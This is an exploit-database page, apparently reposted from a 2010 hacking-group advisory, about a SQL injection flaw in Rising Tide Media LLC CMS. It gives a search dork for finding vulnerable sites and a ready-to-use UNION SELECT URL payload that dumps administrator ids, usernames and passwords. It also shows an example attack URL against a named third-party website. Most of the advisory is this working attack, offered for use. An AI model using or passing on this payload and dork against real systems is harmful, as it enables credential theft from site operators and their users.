Rising Tide Media LLC CMS remote SQL injection

2010-06-24 / 2010-06-25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Rising Tide Media LLC CMS SQL Injection Vulnerability * EDB-ID: * CVE: * OSVDB-ID: * Author: Dr.0rYX and Cr3w-DZ * Published: * Verified: * Exploit Code: * Vulnerable App: **************************************************************************************************** * _______ ___________.__ ___________ .__ * * ____ \ _ \______\__ ___/| |__ _____ \_ _____/______|__| ____ _____ * * / \/ /_\ \_ __ \| | | | \ ______ \__ \ | __) \_ __ \ |/ ___\\__ \ * * | | \ \_/ \ | \/| | | Y \ /_____/ / __ \_| \ | | \/ \ \___ / __ \_ * * |___| /\_____ /__| |____| |___| / (____ /\___ / |__| |__|\___ >____ / * * \/ \/ \/ \/ \/ \/ \/ * * .__ __ __ * * ______ ____ ____ __ _________|__|/ |_ ___.__. _/ |_ ____ _____ _____ * * / ___// __ \_/ ___\| | \_ __ \ \ __< | | \ __\/ __ \\__ \ / \ * * \___ \\ ___/\ \___| | /| | \/ || | \___ | | | \ ___/ / __ \| Y Y \ * * /____ >\___ >\___ >____/ |__| |__||__| / ____| |__| \___ >____ /__|_| / * * \/ \/ \/ \/ \/ \/ \/ * * Pr!v8 Expl0iT AND t00l ** * * ALGERIAN HACKERS * *********************************- NORTH-AFRICA SECURITY TEAM -************************************* [!] Rising Tide Media LLC CMS SQL Injection Vulnerability [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : vx3@hotmail.de<mailto:vx3@hotmail.de> & Cr3w@hotmail.de<mailto:Cr3w@hotmail.de> ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.risingtidemedia.com/ [+] script : Rising Tide Media LLC CMS [+] Download : http://www.risingtidemedia.com/contact.html (sell script ) [+] Vulnerability : SQL injection [+] Dork : inurl:"report_content.php?report_id=" **************************************************************************/ [ Vulnerable File ] http://server/report_content.php?report_id=[N.A.S.T ] [ Exploit ] http://server/report_content.php?report_id=-1+union+select+1,2,3,concat(id,0x3a,user_name,0x3a,user_password),5,6,7+from+administrators [ ExAMPLE ] http://www.justifiedcharters.com/report_content.php?report_id=-189+union+select+1,2,3,concat%28id,0x3a,user_name,0x3a,user_password%29,5,6,7+from+administrators [ GReet ] [+] :claw , exploit-db.com , ALL HACKERS MUSLIMS


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top